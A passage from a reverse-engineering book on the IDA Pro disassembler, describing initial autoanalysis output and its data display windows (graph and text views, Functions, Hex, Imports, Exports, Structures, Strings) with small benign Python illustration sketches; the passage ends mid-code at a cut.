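    return (address - start) * width // (end - start)


def column_address(column, start, end, width):
    """Inverse mapping: the first address represented by pixel `column`."""
    if not 0 <= column < width:
        raise ValueError("column outside the band")
    return start + column * (end - start) // width


# A 64KB address range drawn in an 800-pixel-wide band.
START, END, WIDTH = 0x401000, 0x411000, 800
print(band_column(0x409000, START, END, WIDTH))        # 400
print(hex(column_address(400, START, END, WIDTH)))     # 0x409000
```

Zooming the band corresponds to narrowing the start and end values, which spreads a smaller address range across the same number of columns.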

Desktop Behavior During Initial Analysis

A tremendous amount of activity takes place within the IDA desktop during

the initial autoanalysis of a newly opened file. You can gain an understanding

of this analysis by observing various desktop displays during the analysis pro-

cess. Desktop activity you may observe includes the following:

• Progress messages printed to the Output window

• Initial location and disassembly output generated for the disassembly

window

• Initial population of the Functions window, followed by periodic updates

as the analysis progresses

• Transformation of the navigation band as new areas of the binary are

recognized as code and data, blocks of code are further recognized as

functions, and, finally, functions are recognized specifically as library

code using IDA’s pattern-matching techniques

• The current position indicator traversing the navigation band to show

the regions currently being analyzed

The following output is representative of messages generated by IDA

during the initial analysis of a newly opened binary file. Notice that the

messages form a narrative of the analysis process and offer insight into the

sequence of operations performed by IDA during that analysis.

Loading file 'C:\IdaBook\ch4_example.exe' into database...

Detected file format: Portable executable for 80386 (PE)

0. Creating a new segment (00401000-0040C000) ... ... OK

1. Creating a new segment (0040C000-0040E000) ... ... OK

2. Creating a new segment (0040E000-00411000) ... ... OK

Reading imports directory...

3. Creating a new segment (0040C120-0040E000) ... ... OK

Plan FLIRT signature: Microsoft VisualC 2-10/net runtime

autoload.cfg: vc32rtf.sig autoloads mssdk.til

Assuming __cdecl calling convention by default

main() function at 401070, named "_main"

Marking typical code sequences...

Flushing buffers, please wait...ok

File 'C:\IdaBook\ch4_example.exe' is successfully loaded into the database.

Compiling file 'C:\Program Files\IdaPro\idc\ida.idc'...

Executing function 'main'...

Compiling file 'C:\Program Files\IdaPro\idc\onload.idc'...

Executing function 'OnLoad'...

IDA is analysing the input file...

➊ You may start to explore the input file right now.

------------------------------------------------------------------------------

Python 2.6.5 (r265:79096, Mar 19 2010, 21:48:26) [MSC v.1500 32 bit (Intel)]

IDAPython v1.4.2 final (serial 0) (c) The IDAPython Team

<idapython@googlegroups.com>

------------------------------------------------------------------------------

Using FLIRT signature: Microsoft VisualC 2-10/net runtime

Propagating type information...

Function argument information has been propagated

➋ The initial autoanalysis has been finished.

Two particularly helpful progress messages are You may start to explore

the input file right now ➊ and The initial autoanalysis has been finished

➋. The first message informs you that IDA has made enough progress with

its analysis that you can begin navigating through the various data displays.

Navigating does not imply changing, however, and you should wait to make

any changes to the database until the analysis phase has been completed. If

you attempt to change the database prior to completion of the analysis phase,

the analysis engine may come along later and modify your changes further,

or you may even prevent the analysis engine from doing its job correctly. The

second of these messages, which is fairly self-explanatory, indicates that you

can expect no more automatic changes to take place in the desktop data dis-

plays. At this point it is safe to make any changes you like to the database.
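If you copy the contents of the Output window to a text file, the same narrative can be checked mechanically. The following Python sketch is one way to do that. It relies only on the message texts shown in the listing above; the function name summarize_log and the dictionary keys are hypothetical.

```python
import re

SEGMENT_RE = re.compile(
    r"Creating a new segment\s+\(([0-9A-Fa-f]+)-([0-9A-Fa-f]+)\)")
EXPLORE_MSG = "You may start to explore the input file right now."
FINISHED_MSG = "The initial autoanalysis has been finished."


def summarize_log(text):
    """Extract segment ranges and the two milestone messages from Output text."""
    segments = [(int(lo, 16), int(hi, 16)) for lo, hi in SEGMENT_RE.findall(text)]
    return {
        "segments": segments,
        "can_explore": EXPLORE_MSG in text,   # navigation is possible
        "finished": FINISHED_MSG in text,     # changes are now safe
    }


sample = """\
0. Creating a new segment (00401000-0040C000) ... ... OK
1. Creating a new segment (0040C000-0040E000) ... ... OK
IDA is analysing the input file...
You may start to explore the input file right now.
"""
summary = summarize_log(sample)
print(summary["can_explore"], summary["finished"])
```

For this truncated sample the summary reports that exploring is possible but that analysis has not finished, which is exactly the window in which you should avoid changing the database.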

IDA Desktop Tips and Tricks

IDA offers a tremendous amount of information, and its desktop can become

cluttered. Here are some tips for making the best use of your desktop:

• The more screen real estate you dedicate to IDA, the happier you will be.

Use this fact to justify the purchase of a king-size monitor (or two)!

• Don’t forget the View ▸ Open Subviews command as a means of restoring

data displays that you have inadvertently closed.

• The Windows ▸ Reset Desktop command offers a useful way to quickly

restore your desktop to its original layout.

• Utilize the Windows ▸ Save Desktop command to save a current layout of

desktop configurations that you find particularly useful. The Windows ▸

Load Desktop command is used to quickly revert to a saved layout.

• The only window for which the display font can be changed is the

Disassembly window (either graph or listing view). Fonts are set using

the Options ▸ Font command.

Reporting Bugs

As with any piece of software, IDA has been known to contain an occasional

bug, so what can you expect from Hex-Rays if you think you have found a

bug in IDA itself? First, Hex-Rays has one of the most responsive support

systems you will ever deal with. Second, don’t be surprised if you hear back

from Ilfak himself within a day of submitting a support request.

Two methods are available for submitting bug reports. You can send

email to support@hex-rays.com, or if you prefer not to use email, you may post

to the Bug Reports forum on the Hex-Rays bulletin boards. In either case,

you should both verify that you can reproduce your bug and be prepared to

provide Hex-Rays with a copy of the database file involved with the problem.

Recall that Hex-Rays only provides SDK support for an additional fee. For

bugs related to a plug-in that you have installed, you will need to contact the

plug-in’s author. For bugs related to a plug-in that you are developing, you

will need to take advantage of the support forums available for IDA users and

hope for a helpful response from a fellow user.

Summary

Familiarity with the IDA workspace will greatly enhance your experience with

IDA. Reverse engineering binary code is difficult enough without having to

struggle with your tools. The options that you choose during the initial load-

ing phase and the subsequent autoanalysis performed by IDA set the stage

for all of the analysis that you will do later. At this point you may be content

with the work that IDA has accomplished on your behalf, and for simple

binaries, autoanalysis may be all that you need. On the other hand, if you

wonder what puts the interactive in IDA, you are now ready to dive deeper

into the functionality of IDA’s many data displays. In the coming chapters

you will be introduced to each of the primary displays, the circumstances

under which you will find each one useful, and how to utilize these displays

to enhance and update your databases.

IDA DATA DISPLAYS

At this point you should have some confi-

dence loading binaries into IDA and letting

IDA work its magic while you sip your favorite

beverage. Once IDA’s initial analysis phase is com-

plete, it is time for you to take control. One of the best

ways for you to familiarize yourself with IDA’s displays is

simply to browse around the various tabbed subwindows that IDA populates

with data about your binary. The efficiency and effectiveness of your reverse

engineering sessions will improve as your comfort level with IDA increases.

Before we dive into the major IDA subdisplays, it is useful to cover a few

basic rules concerning IDA’s user interface:

There is no undo in IDA.

If something unexpected happens to your database as a result of an

inadvertent keypress, you are on your own to restore your displays to

their previous states.

Almost all actions have an associated menu item, hotkey, and toolbar button.

Remember, the IDA toolbar is highly configurable, as is the mapping of

hotkeys to menu actions.

IDA offers good, context-sensitive menu actions in response to right mouse

clicks.

While these menus do not offer an exhaustive list of permissible actions

at a given location, they do serve as good reminders for the most common

actions you will be performing.

With these facts in mind, let’s begin our coverage of the principal IDA

data displays.

The Principal IDA Displays

In its default configuration, IDA creates seven (as of version 6.1) display win-

dows during the initial loading-and-analysis phase for a new binary. Each of

these display windows is accessible via a set of title tabs displayed immediately

beneath the navigation band (shown previously in Figure 4-9). The three

immediately visible windows are the IDA-View window, the Functions window,

and the Output window. Whether or not they are open by default, all of the

windows discussed in this chapter can be opened via the View ▸ Open

Subviews menu. Keep this fact in mind, as it is fairly easy to inadvertently close

the display windows.

The ESC key is one of the more useful hotkeys in all of IDA. When the

disassembly window is active, the ESC key functions in a manner similar to

a web browser’s back button and is therefore very useful in navigating the

disassembly display (navigation is covered in detail in Chapter 6). Unfor-

tunately, when any other window is active, the ESC key serves to close the win-

dow. Occasionally, this is exactly what you want. At other times, you will

immediately wish you had that closed window back.

The Disassembly Window

Also known as the IDA-View window, the disassembly window will be your

primary tool for manipulating and analyzing binaries. Accordingly, it is

important that you become intimately familiar with the manner in which

information is presented in the disassembly window.

Two display formats are available for the disassembly window: the default

graph-based view and a text-oriented listing view. Most IDA users tend to pre-

fer one view over the other, and the view that better suits your needs is often

determined by how you prefer to visualize a program’s flow. If you prefer to

use the text listing view as your default disassembly view, you can change the

default by using the OptionsGeneral dialog to turn off Use graph view by

default on the Graph tab. Whenever the disassembly view is active, you can

easily switch between graph and listing views at any time by using the spacebar.

IDA Graph View

Figure 5-1 shows a very simple function displayed in graph view. Graph views

are somewhat reminiscent of program flowcharts in that a function is broken

up into basic blocks¹ so you can visualize the function’s control flow from

one block to another.

Figure 5-1: IDA graph view

1. A basic block is a maximal sequence of instructions that executes, without branching, from

beginning to end. Each basic block therefore has a single entry point (the first instruction in

the block) and a single exit point (the last instruction in the block). The first instruction in a

basic block is often the target of a branching instruction, while the last instruction in a basic

block is often a branch instruction.

Onscreen, you’ll notice IDA uses different colored arrows to distinguish

various types of flows² between the blocks of a function. Basic blocks that

terminate with a conditional jump generate two possible flows depending on

the condition being tested: the Yes edge arrow (yes, the branch is taken) is

green by default, and the No edge arrow (no, the branch is not taken) is red

by default. Basic blocks that terminate with only one potential successor block

utilize a Normal edge (blue by default) to point to the next block to be executed.
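The relationship between basic blocks and edge types can be made concrete with a short Python sketch. This is a textbook leader-based block split applied to a made-up instruction list; it is not IDA’s algorithm. The function name build_graph, the tuple layout, and the rule that any mnemonic starting with j is a jump are all assumptions of the example.

```python
def build_graph(instructions):
    """Split instructions into basic blocks and label the edges between them.

    instructions -- list of (address, mnemonic, target) tuples in address
                    order; target is a jump destination or None.
    Returns (block_start_addresses, edges), where each edge is
    (from_block, to_block, kind) and kind is "yes", "no", or "normal".
    """
    addrs = [addr for addr, _, _ in instructions]
    leaders = {addrs[0]}                      # the first instruction starts a block
    for i, (_, mnem, target) in enumerate(instructions):
        is_jump = mnem.startswith("j")        # toy rule: jmp, jge, jz, ...
        if is_jump:
            leaders.add(target)               # a jump target starts a block
        if (is_jump or mnem == "ret") and i + 1 < len(instructions):
            leaders.add(addrs[i + 1])         # so does whatever follows a branch

    blocks = []
    for ins in instructions:
        if ins[0] in leaders:
            blocks.append([])
        blocks[-1].append(ins)

    edges = []
    for i, block in enumerate(blocks):
        start = block[0][0]
        _, mnem, target = block[-1]
        following = blocks[i + 1][0][0] if i + 1 < len(blocks) else None
        if mnem == "jmp":
            edges.append((start, target, "normal"))      # single successor
        elif mnem.startswith("j"):
            edges.append((start, target, "yes"))         # branch taken
            if following is not None:
                edges.append((start, following, "no"))   # branch not taken
        elif mnem != "ret" and following is not None:
            edges.append((start, following, "normal"))   # fall through
    return [b[0][0] for b in blocks], edges


# A made-up loop: compare, exit if done, otherwise do work and repeat.
code = [
    (0x10, "mov", None), (0x12, "cmp", None), (0x14, "jge", 0x1C),
    (0x16, "add", None), (0x18, "inc", None), (0x1A, "jmp", 0x12),
    (0x1C, "ret", None),
]
starts, edges = build_graph(code)
print([hex(s) for s in starts])
for src, dst, kind in edges:
    print(hex(src), "->", hex(dst), kind)
```

The block that ends with the conditional jump is the only one with two outgoing edges, which is where graph view would draw one green and one red arrow by default.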

In graph mode, IDA displays one function at a time. For users with a

wheel mouse, graph zooming is possible using the CTRL-wheel combination.

Keyboard zoom control requires CTRL-+ to zoom in or CTRL-− to zoom out

(using the + and − keys on the numeric keypad). Large or complex functions

may cause the graph view to become extremely cluttered, making the graph

difficult to navigate. In such cases, the Graph Overview window (see Figure 5-2)

is available to provide some situational awareness. The overview window always

displays the complete block structure of the graph along with a dashed frame

that indicates the region of the graph currently being viewed in the disas-

sembly window. The dashed frame can be dragged across the overview window

to rapidly reposition the graph view to any desired location on the graph.

Figure 5-2: The Graph Overview window

With the graph display, there are several ways that you can manipulate

the view to suit your needs:

Panning

First, in addition to using the Graph Overview window to rapidly

reposition the graph, you can also reposition the graph by clicking and

dragging the background of the graph view.

2. IDA uses the term flow to indicate how execution can continue from a given instruction. A

normal (also called ordinary) flow indicates default sequential execution of instructions. A jump

flow indicates that the current instruction jumps (or may jump) to a nonsequential location. A

call flow indicates that the current instruction calls a subroutine.

HEY, ISN’T SOMETHING MISSING HERE?

When using graph view, it may seem as if less information is available to you about

each line of the disassembly. The reason for this is that IDA chooses to hide many of

the more traditional pieces of information about each disassembled line (such as

virtual address information) in order to minimize the amount of space required to

display each basic block. You can choose to display additional information with

each disassembly line by choosing among the available disassembly line parts

accessible via the Disassembly tab from Options ▸ General. For example, to add

virtual addresses to each disassembly line, we enable line prefixes, transforming the

graph from Figure 5-1 into the graph shown in Figure 5-3.

Figure 5-3: Graph view with line prefixes enabled

Rearranging blocks

Individual blocks within the graph can be dragged to new positions by

clicking the title bar for the desired block and dragging it to a new

position. Beware that IDA performs only minimal rerouting of any edges

associated with a moved block. You can manually reroute edges by drag-

ging vertices to new locations. New vertices can be introduced into an

edge by double-clicking the desired location within an edge while

holding the SHIFT key. If at any point you find yourself wishing to revert

to the default layout for your graph, you can do so by right-clicking the

graph and choosing Layout Graph.

Grouping and collapsing blocks

Blocks can be grouped, either individually or together with other blocks,

and collapsed to reduce the clutter in the display. Collapsing blocks is a

particularly useful technique for keeping track of blocks that you have

already analyzed. You can collapse any block by right-clicking the block’s

title bar and selecting Group Nodes.

Creating additional disassembly windows

If you ever find yourself wanting to view graphs of two functions simulta-

neously, all you need to do is open another disassembly window using

ViewsOpen SubviewsDisassembly. The first disassembly window

opened is titled IDA View-A. Subsequent disassembly windows are titled

IDA View-B, IDA View-C, and so on. Each disassembly is independent of

the other, and it is perfectly acceptable to view a graph in one window

while viewing a text listing in another or to view three different graphs

in three different windows.

Keep in mind that your control over the view extends beyond just these

examples. Additional IDA graphing capabilities are covered in Chapter 9,

while more information on the manipulation of IDA’s graph view is available

in the IDA help file.

IDA Text View

The text-oriented disassembly window is the traditional display used for

viewing and manipulating IDA-generated disassemblies. The text display

presents the entire disassembly listing of a program (as opposed to a single

function at a time in graph mode) and provides the only means for viewing

the data regions of a binary. All of the information available in the graph dis-

play is available in the text display in one form or another.

Figure 5-4 shows the text view listing of the same function shown in Fig-

ures 5-1 and 5-3. The disassembly is presented in linear fashion, with virtual

addresses displayed by default. Virtual addresses are typically displayed in a

[SECTION NAME]:[VIRTUAL ADDRESS] format such as .text:004011C1.

Figure 5-4: The IDA text view

The left portion of the display, seen at ➊, is called the arrows window

and is used to depict nonlinear flow within a function. Solid arrows represent

unconditional jumps, while dashed arrows represent conditional jumps. When

a jump (conditional or unconditional) transfers control to an earlier address

in the program, a heavy weighted line (solid or dashed) is used. Such reverse

flow in a program often indicates the presence of a loop. In Figure 5-4, a

loop arrow flows from address 004011CF to 004011C5.
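The drawing rules for the arrows window reduce to two independent choices, which the following Python sketch spells out. The function name arrow_style is hypothetical, and because the text does not say whether the jump at 004011CF is conditional, the conditional flag in the example call is an assumption.

```python
def arrow_style(source, target, conditional):
    """Return (line, weight) for a jump from `source` to `target`."""
    line = "dashed" if conditional else "solid"
    # A jump to an earlier address is drawn heavy and often marks a loop.
    weight = "heavy" if target < source else "normal"
    return line, weight


# The loop arrow from Figure 5-4; conditional=True is assumed for illustration.
print(arrow_style(0x004011CF, 0x004011C5, conditional=True))
```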

The declarations at ➋ (also present in graph view) represent IDA’s best

estimate concerning the layout of the function’s stack frame.³ IDA computes

the structure of a function’s stack frame by performing detailed analysis of the

behavior of the stack pointer and any stack frame pointer used within a func-

tion. Stack displays are discussed further in Chapter 6.

The comments (a semicolon introduces a comment) at ➌ are

cross-references. In this case we see code cross-references (as opposed to data

cross-references), which indicate that another program instruction transfers control

to the location containing the cross-reference comment. Cross-references are

the subject of Chapter 9.

For the remainder of the book we will primarily utilize the text display

for examples. We’ll use the graph display only in cases where it may provide

significantly more clarity. In Chapter 7 we will cover the specifics of manipu-

lating the text display in order to clean up and annotate a disassembly.

3. A stack frame (or activation record) is a block of memory, allocated in a program’s runtime stack,

that contains both the parameters passed into a function and the local variables declared within

the function. Stack frames are allocated upon entry into a function and released as the function

exits. Stack frames are discussed in more detail in Chapter 6.

The Functions Window

The Functions window is used to list every function that IDA has recognized

in the database. A Functions window entry might look like the following:

malloc .text 00BDC260 00000180 R . . . B . .

This particular line indicates that the malloc function can be found in the

.text section of the binary at virtual address 00BDC260, is 384 bytes (hex 180)

long, returns to the caller (R), and uses the EBP register (B) to reference its

local variables. Flags used to describe a function (such as R and B above) are

described in IDA’s built-in help file. You can also view them by right-clicking a

function and choosing Properties; the flags are shown as editable checkboxes

in the resulting Properties dialog.

As with other display windows, double-clicking an entry in the Functions

window causes the disassembly window to jump to the location of the selected

function.
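To make the column layout of a Functions window entry explicit, the following Python sketch splits the sample line shown above into named fields. The field names and the function parse_function_entry are hypothetical, and the whitespace split assumes a function name that contains no spaces.

```python
from collections import namedtuple

FunctionEntry = namedtuple("FunctionEntry", "name segment start length flags")


def parse_function_entry(line):
    """Parse one Functions window line: name, segment, start, length, flags."""
    fields = line.split()
    name, segment, start, length = fields[:4]
    # A "." in a flag column means the flag is not set.
    flags = {field for field in fields[4:] if field != "."}
    return FunctionEntry(name, segment, int(start, 16), int(length, 16), flags)


entry = parse_function_entry("malloc .text 00BDC260 00000180 R . . . B . .")
print(entry.name, hex(entry.start), entry.length, sorted(entry.flags))
```

The length field parses to 384, matching the hex 180 in the listing, and only the R and B flags are reported as set.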

The Output Window

The Output window at the bottom of the IDA workspace rounds out the

default set of windows that are visible when a new file is opened. The Output

window serves as IDA’s output console and is the place to look for information

on tasks IDA is performing. When a binary is first opened, for example,

messages are generated to indicate both what phase of analysis IDA is in at

any given time and what actions IDA is carrying out to create the new database.

As you work with a database, the Output window is used to output the status

of various operations that you perform. The contents of the Output window

can be copied to the system clipboard or cleared entirely by right-clicking

anywhere in the window and selecting the appropriate operation. The Output

window will often be the primary means by which you display output from

any scripts and plug-ins that you develop for IDA.

Secondary IDA Displays

In addition to the disassembly, Functions, and Output windows, IDA opens a

number of other tabbed windows on your IDA desktop. These tabs are present

just under the navigation band (see ➌ in Figure 4-9). These windows are

used to provide alternate or specialized views into the database. The utility

of these displays depends on both the characteristics of the binary you are

analyzing and your skill with IDA. Several of these windows are sufficiently

specialized to require more detailed coverage in later chapters.

The Hex View Window

Hex View is something of a misnomer in this case, as the IDA Hex View win-

dow can be configured to display a variety of formats and doubles as a hex

editor. By default, the Hex View window provides a standard hex dump of

the program content with 16 bytes per line and ASCII equivalents displayed

alongside. As with the disassembly window, several hex views can be opened

simultaneously. The first Hex window is titled Hex View-A, the second Hex

View-B, the next Hex View-C, and so on. By default, the first Hex window is

synchronized with the first disassembly window. When a disassembly view

is synchronized with a hex view, scrolling in one window causes the other

window to scroll to the same location (same virtual address). In addition,

when an item is selected in disassembly view, the corresponding bytes are

highlighted in hex view. In Figure 5-5, the disassembly view cursor is posi-

tioned at address 0040108C, a call instruction, causing the five bytes that make

up the instruction to be highlighted in the Hex window.

Figure 5-5: Synchronized hex and disassembly views

Also shown in Figure 5-5 is the hex display context menu, available

when you right-click anywhere within the hex display. This context menu is

where you may specify with which, if any, disassembly view you would like to

synchronize a particular hex display. Deselecting the synchronization option

allows a Hex window to be scrolled independently of any disassembly window.

Selecting the Edit menu option turns the Hex View into a hex editor. Once

you are finished editing, you must either commit or cancel your changes in

order to return to view mode. The Data Format menu item allows you to

select from a variety of display formats such as 1-, 2-, 4-, or 8-byte hexadeci-

mal; signed decimal; or unsigned decimal integers and various floating point

formats. The Columns menu option allows you to change the number of col-

umns used in the display, and the Text option allows you to turn the text

dump on and off.

In some cases you may find that the Hex window shows nothing but

question marks. This is IDA’s way of telling you that it has no idea what values

might occupy a given virtual address range. Such is the case when a program

contains a bss⁴ section, which typically occupies no space within a file but is

expanded by the loader to accommodate the program’s static storage

requirements.
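The default hex dump layout, including the question marks shown for bytes whose values are unknown, can be imitated in a few lines of Python. This is only a sketch of the general format (address, 16 hex bytes, text column) and not a reproduction of IDA’s exact output. The function name hex_dump is hypothetical, unknown bytes are represented by None, and showing a single ? for them in the text column is a choice made for this example.

```python
def hex_dump(data, base=0, width=16):
    """Format `data` as hex dump lines.

    data -- sequence of ints in 0..255, or None where no value is known
            (as for uninitialized bss bytes).
    """
    lines = []
    for offset in range(0, len(data), width):
        chunk = data[offset:offset + width]
        hex_part = " ".join("??" if b is None else "%02X" % b for b in chunk)
        text = "".join(
            "?" if b is None else (chr(b) if 32 <= b < 127 else ".")
            for b in chunk)
        # Pad the hex column so the text column lines up on short rows.
        lines.append("%08X  %-*s  %s" % (base + offset, width * 3 - 1, hex_part, text))
    return lines


for line in hex_dump(list(b"IDA Pro\x00") + [None] * 4, base=0x00401000):
    print(line)
```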

The Exports Window

The Exports window lists the entry points into a file. These include the pro-

gram’s execution entry point, as specified in its header section, along with

any functions and variables that the file exports for use by other files. Exported

functions are commonly found in shared libraries such as Windows DLL files.

Exported entries are listed by name, virtual address, and, if applicable, by

ordinal number.⁵ For executable files, the Exports window always contains at

least one entry: the program’s execution entry point. IDA names this entry

point start. A typical Exports window entry follows:

LoadLibraryA 7C801D77 578

As with many of the other IDA windows, double-clicking an entry in the

Exports window will jump the disassembly window to the address associated

with that entry. The Exports window offers functionality available in command-

line tools such as objdump (-T), readelf (-s), and dumpbin (/EXPORTS).
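Because an export can be located either by name or by ordinal, it can help to think of the Exports window as two lookup tables over the same addresses. The Python sketch below builds both from entries in the format shown above. The function names are hypothetical, the ordinal column is assumed to be decimal, and the second entry (start at 00401000) is invented for the example.

```python
def parse_export(line):
    """Split an Exports window entry into (name, address, ordinal)."""
    fields = line.split()
    name = fields[0]
    address = int(fields[1], 16)
    # The ordinal column is optional; it is assumed here to be decimal.
    ordinal = int(fields[2]) if len(fields) > 2 else None
    return name, address, ordinal


def index_exports(lines):
    """Build name -> address and ordinal -> address lookup tables."""
    by_name, by_ordinal = {}, {}
    for line in lines:
        name, address, ordinal = parse_export(line)
        by_name[name] = address
        if ordinal is not None:
            by_ordinal[ordinal] = address
    return by_name, by_ordinal


by_name, by_ordinal = index_exports([
    "LoadLibraryA 7C801D77 578",
    "start 00401000",            # invented entry with no ordinal
])
print(hex(by_name["LoadLibraryA"]), hex(by_ordinal[578]))
```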

The Imports Window

The Imports window is a counterpart to the Exports window. It lists all func-

tions that are imported by the binary being analyzed. The Imports window is

relevant only when a binary makes use of shared libraries. Statically linked

binaries have no external dependencies and therefore no imports. Each entry

in the Imports window lists the name of an imported item (function or data)

and the name of the library that contains that item. Since the code for an

imported function resides in a shared library, the addresses listed with each

entry refer to the virtual address of the associated import table entry.⁶ An

example of an Import window entry is shown here:

0040E108 GetModuleHandleA KERNEL32

4. A bss section is created by a compiler to house all of a program’s uninitialized, static variables.

Since no initial value is assigned to these variables, there is no need to allocate space for them

in the program’s file image, so the section’s size is noted in one of the program’s headers.

When the program is executed, the loader allocates the required space and initializes the entire

block to zero.

5. An export ordinal number may be used in a shared library to make a function accessible by

number rather than name. The use of ordinals can speed the address lookup process and allow

programmers to hide the names of their functions. Export ordinals are used in Windows DLLs.

6. An import table provides space for a loader to store addresses of imported functions once the

required libraries have been loaded and the addresses of those functions are known. A single

import table entry holds the address of one imported function.


Double-clicking this import would jump the disassembly window to

address 0040E108. The contents of this memory location in hex view would

be ?? ?? ?? ??. IDA is a static analysis tool, and it has no way to know what

address will be entered into this memory location when the program is exe-

cuted. The Imports window also offers functionality available in command-

line tools such as objdump (-T), readelf (-s), and dumpbin (/IMPORTS).

An important point to remember about the Imports window is that it

displays only the symbols that a binary wants handled automatically by the

dynamic loader. Symbols that a binary chooses to load on its own using a

mechanism such as dlopen/dlsym or LoadLibrary/GetProcAddress will not be

listed in the Imports window.
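The relationship between an import table entry and the loader can be sketched in a few lines of Python. This is a simplified model under stated assumptions, not the behavior of any real loader: the names ImportEntry and resolve_imports are hypothetical, and the runtime address used in the usage note is invented purely for illustration.

```python
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass
class ImportEntry:
    slot_address: int            # virtual address of the import table entry
    name: str                    # imported symbol name
    library: str                 # library expected to provide the symbol
    value: Optional[int] = None  # unknown until a loader fills the slot

    def hex_view(self) -> str:
        """Render the 4-byte slot the way a hex view would (little-endian)."""
        if self.value is None:
            # A static tool cannot know what the loader will store here.
            return "?? ?? ?? ??"
        return " ".join(f"{b:02X}" for b in self.value.to_bytes(4, "little"))


def resolve_imports(table: List[ImportEntry],
                    loaded: Dict[str, Dict[str, int]]) -> None:
    """Model the loader: store each resolved function address in its slot."""
    for entry in table:
        entry.value = loaded[entry.library][entry.name]
```

Before resolve_imports runs, ImportEntry(0x0040E108, "GetModuleHandleA", "KERNEL32").hex_view() yields ?? ?? ?? ??, which mirrors what a static view shows. A symbol fetched through GetProcAddress or dlsym never gets a slot in this table at all, which is why it would not appear in the Imports window.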

The Structures Window

The Structures window is used to display the layout of any complex data struc-

tures, such as C structs or unions, that IDA determines are in use within a

binary. During the analysis phase, IDA consults its extensive library of function-

type signatures in an attempt to match function parameter types to memory

used within the program. The Structures window shown in Figure 5-6 indicates

that IDA believes the program uses the sockaddr⁷ data structure.

Figure 5-6: The Structures window

There are many possible reasons why IDA may have arrived at this con-

clusion. One such reason might be that IDA has observed a call to the C library

connect⁸ function to establish a new network connection. Double-clicking the

name of a data structure (sockaddr in this case) causes IDA to expand the

structure, and this allows you to see the detailed layout of the structure,

including individual field names and sizes.

The two primary uses for the Structures window are (1) to provide a

ready reference for the layout of standard data structures and (2) to provide

you with a means to create your own data structures for use as memory layout

templates when you discover custom data structures within a program. Struc-

ture definition and the application of structures within disassemblies are cov-

ered in more detail in Chapter 8.

7. A sockaddr structure is a datatype from the sockets API that is often used to represent an

endpoint in a network connection. A sockaddr variable can be used to hold an IP address and

port number as part of the process of establishing a TCP connection to a remote computer.

8. int connect(int sockfd, const struct sockaddr *serv_addr, socklen_t addrlen);


The Enums Window

The Enums window is somewhat similar to the Structures window. When IDA

detects the use of a standard enumerated datatype (C enum), that datatype will

be listed in the Enums window. You can make your disassemblies far more

readable by using enums in place of integer constants. Like the Structures

window, the Enums window offers facilities for defining your own enumerated

types that you can use with your disassembled binaries.

Tertiary IDA Displays

The last windows that we will discuss are those that IDA does not open by

default. Each of these windows is available via View ▸ Open Subviews, but

they tend to provide information to which you may not require immediate

access and are thus initially kept out of the way.

The Strings Window

The Strings window is the built-in IDA equivalent of the strings utility and

then some. In IDA versions 5.1 and earlier, the Strings window was open as

part of the default desktop; however, with version 5.2, the Strings window

is no longer open by default, though it remains available via View ▸ Open

Subviews ▸ Strings.

The purpose of the Strings window is to display a list of strings extracted

from a binary along with the address at which each string resides. Like double-

clicking names in the Names window, double-clicking any string listed in the

Strings window causes the disassembly window to jump to the address of the

selected string. When used with cross-references (Chapter 9), the Strings

window provides the means to rapidly spot an interesting string and to track

back to any location in the program that references that string. For example,

you might see the string SOFTWARE\Microsoft\Windows\CurrentVersion\Run

listed and wonder why an application is referencing this particular key within

the Windows registry. As you will see in the following chapter, navigating to

the program location that references this string takes only four clicks. Under-

standing the operation of the Strings window is essential to using it effectively.

IDA does not permanently store the strings it extracts from a binary. There-

fore, every time the Strings window is opened, the entire database must be

scanned or rescanned for string content. String scanning is performed in

accordance with the settings of the Strings window, and you can access these

settings by right-clicking within the Strings window and selecting Setup. As

shown in Figure 5-7, the Setup Strings window is used to specify the types of

strings that IDA should scan for. The default string type that IDA scans for

is a C-style, null-terminated, 7-bit, ASCII string of at least five characters in

length.
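To make the default scan criteria concrete, here is a minimal Python sketch that looks for null-terminated runs of printable 7-bit ASCII of at least five characters. It is not IDA's implementation; the function name scan_c_strings, the base parameter, and the choice of 0x20 through 0x7E as the "printable" range are assumptions made for illustration.

```python
import re
from typing import List, Tuple


def scan_c_strings(data: bytes, base: int = 0,
                   min_len: int = 5) -> List[Tuple[int, str]]:
    """Return (address, text) for each NUL-terminated printable ASCII run."""
    # At least min_len printable characters followed by a terminating NUL.
    pattern = re.compile(rb"([\x20-\x7e]{%d,})\x00" % min_len)
    return [(base + m.start(1), m.group(1).decode("ascii"))
            for m in pattern.finditer(data)]
```

Runs shorter than min_len, and runs that are not followed by a NUL byte, are skipped, which is why changing the minimum length or the string type changes what such a scan reports.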


Figure 5-7: The Setup Strings window

If you expect to encounter anything other than C-style strings, you should

reconfigure the Setup Strings window to choose the appropriate string type

to search for. For example, Windows programs often make use of Unicode

strings, while Borland Delphi binaries use Pascal-style strings with a 2-byte

length. Every time you close the Setup Strings window by clicking OK, IDA

will rescan the database for strings in accordance with the new settings. Two

setup options deserve special mention:

Display only defined strings

This option restricts the Strings window to displaying only named string

data items that have been automatically created by IDA or manually cre-

ated by the user. With this option selected, all other options are disabled,

and IDA will not automatically scan for additional string content.

Ignore instructions/data definitions

This option causes IDA to scan for strings across instruction and existing

data definitions. Using this option allows IDA to (1) see strings that may

be embedded in the code portion of a binary and have been mistakenly

converted into instructions or (2) to see strings within data that may be

formatted as something other than a string (such as an array of bytes or

integers). This option will also lead to the generation of many junk strings,

which are sequences that happen to consist of five or more ASCII charac-

ters whether or not they are legible. The effect of using this option is

similar to using the strings command with the -a switch.

Figure 5-8 demonstrates that IDA does not necessarily show all strings

within a binary if the strings setup is not configured properly. In this case,

Ignore instructions/data definitions has not been selected.


Figure 5-8: Example of undetected string data

The result is that the string at location .rdata:0040C19C (“Please guess a number

between 1 and %d.”) remains undetected. The moral here is to make

sure that you are looking for all of the types of strings you expect to

encounter in all of the places you might find them.
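The point about string types can be illustrated with a short Python sketch that handles two non-C layouts mentioned earlier: UTF-16 text and a Pascal-style string with a 2-byte length prefix. The function names are hypothetical, the UTF-16 scan is restricted to characters in the ASCII range, and little-endian byte order is an assumption; none of this is taken from IDA itself.

```python
import re
import struct
from typing import List, Tuple


def scan_utf16le_strings(data: bytes,
                         min_len: int = 5) -> List[Tuple[int, str]]:
    """Find runs of ASCII-range UTF-16LE characters ending in a 16-bit NUL."""
    # Each character is a printable byte followed by 0x00; the run must be
    # terminated by a two-byte NUL.
    pattern = re.compile(rb"((?:[\x20-\x7e]\x00){%d,})\x00\x00" % min_len)
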